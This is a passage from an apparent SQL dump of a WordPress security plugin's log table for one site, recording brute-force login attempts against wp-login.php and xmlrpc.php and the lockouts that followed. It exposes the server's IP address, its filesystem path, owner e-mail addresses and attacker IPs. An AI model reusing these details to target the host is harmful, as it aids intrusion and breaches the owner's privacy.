Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX7yjDrcQxTmGrCWuaHCgAAAcU\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.223.127\";s:11:\"REMOTE_PORT\";s:5:\"34152\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX7yjDrcQxTmGrCWuaHCgAAAcU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569061835.0172\";s:12:\"REQUEST_TIME\";s:10:\"1569061835\";}}','notice','2019-09-21 10:30:36','2019-09-21 10:30:35',17797120,19287904,'https://bintara.com.my/wp/wp-login.php',1,0,'128.199.223.127'),(25193,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX7hWYqJrDl1gYLQWcVtwAAAAo\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"192.151.218.99\";s:11:\"REMOTE_PORT\";s:5:\"52838\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX7hWYqJrDl1gYLQWcVtwAAAAo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569061766.0258\";s:12:\"REQUEST_TIME\";s:10:\"1569061766\";}}','notice','2019-09-21 10:29:27','2019-09-21 10:29:26',17799424,19290400,'https://bintara.com.my/test/wp-login.php',1,0,'192.151.218.99'),(25191,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:29:19\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:29:19\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:44:19\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:44:19\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:29:20','2019-09-21 10:29:19',17882656,19289400,'https://bintara.com.my/wordpress/wp-login.php',1,0,'206.189.155.76'),(25192,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:29:20','2019-09-21 10:29:19',18088320,19289400,'https://bintara.com.my/wordpress/wp-login.php',1,0,'206.189.155.76'),(25189,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:29:11','2019-09-21 10:29:10',18089808,19290664,'https://bintara.com.my/2019/wp-login.php',1,0,'103.22.250.194'),(25190,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX7f2YqJrDl1gYLQWcVrQAAAAU\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"206.189.155.76\";s:11:\"REMOTE_PORT\";s:5:\"47584\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX7f2YqJrDl1gYLQWcVrQAAAAU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569061759.355\";s:12:\"REQUEST_TIME\";s:10:\"1569061759\";}}','notice','2019-09-21 10:29:20','2019-09-21 10:29:19',17797864,19289400,'https://bintara.com.my/wordpress/wp-login.php',1,0,'206.189.155.76'),(25188,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:29:10\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:29:10\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:44:10\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:44:10\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:29:11','2019-09-21 10:29:10',17883608,19290664,'https://bintara.com.my/2019/wp-login.php',1,0,'103.22.250.194'),(25185,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:28:35\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:28:35\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:43:35\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:43:35\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:28:36','2019-09-21 10:28:35',17882352,19288272,'https://bintara.com.my/wp/wp-login.php',1,0,'35.240.189.61'),(25186,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:28:36','2019-09-21 10:28:35',18087920,19288272,'https://bintara.com.my/wp/wp-login.php',1,0,'35.240.189.61'),(25187,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX7drfBTP0kPOVnb8joKQAAAEk\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"103.22.250.194\";s:11:\"REMOTE_PORT\";s:5:\"44002\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX7drfBTP0kPOVnb8joKQAAAEk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569061750.2902\";s:12:\"REQUEST_TIME\";s:10:\"1569061750\";}}','notice','2019-09-21 10:29:11','2019-09-21 10:29:10',17799624,19290664,'https://bintara.com.my/2019/wp-login.php',1,0,'103.22.250.194'),(25183,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:27:47','2019-09-21 10:27:46',18599496,19609528,'https://bintara.com.my/wordpress/xmlrpc.php',1,0,'166.62.100.99'),(25184,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX7U2YqJrDl1gYLQWcVaQAAABU\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"35.240.189.61\";s:11:\"REMOTE_PORT\";s:5:\"48416\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX7U2YqJrDl1gYLQWcVaQAAABU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569061715.4972\";s:12:\"REQUEST_TIME\";s:10:\"1569061715\";}}','notice','2019-09-21 10:28:36','2019-09-21 10:28:35',17797664,19288272,'https://bintara.com.my/wp/wp-login.php',1,0,'35.240.189.61'),(25182,0,'lockout','username-lockout::admin','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:5:\"admin\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:27:46\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:27:46\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:42:46\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:42:46\";s:16:\"lockout_username\";s:5:\"admin\";}','action','2019-09-21 10:27:47','2019-09-21 10:27:46',18393032,19609528,'https://bintara.com.my/wordpress/xmlrpc.php',1,0,'166.62.100.99'),(25179,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:27:45\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:27:45\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:42:45\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:42:45\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:27:46','2019-09-21 10:27:45',17883816,19289312,'https://bintara.com.my/2019/wp-login.php',1,0,'198.12.149.33'),(25180,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:27:46','2019-09-21 10:27:45',18089528,19289312,'https://bintara.com.my/2019/wp-login.php',1,0,'198.12.149.33'),(25181,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX7IWYqJrDl1gYLQWcVJQAAABY\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.100.99\";s:11:\"REMOTE_PORT\";s:5:\"51370\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX7IWYqJrDl1gYLQWcVJQAAABY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569061665.664\";s:12:\"REQUEST_TIME\";s:10:\"1569061665\";}}','notice','2019-09-21 10:27:47','2019-09-21 10:27:46',18312784,19609528,'https://bintara.com.my/wordpress/xmlrpc.php',1,0,'166.62.100.99'),(25176,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:27:43\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:27:43\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:42:43\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:42:43\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:27:44','2019-09-21 10:27:43',17882784,19288360,'https://bintara.com.my/wordpress/wp-login.php',1,0,'166.62.100.99'),(25177,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:27:44','2019-09-21 10:27:43',18088560,19288360,'https://bintara.com.my/wordpress/wp-login.php',1,0,'166.62.100.99'),(25178,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 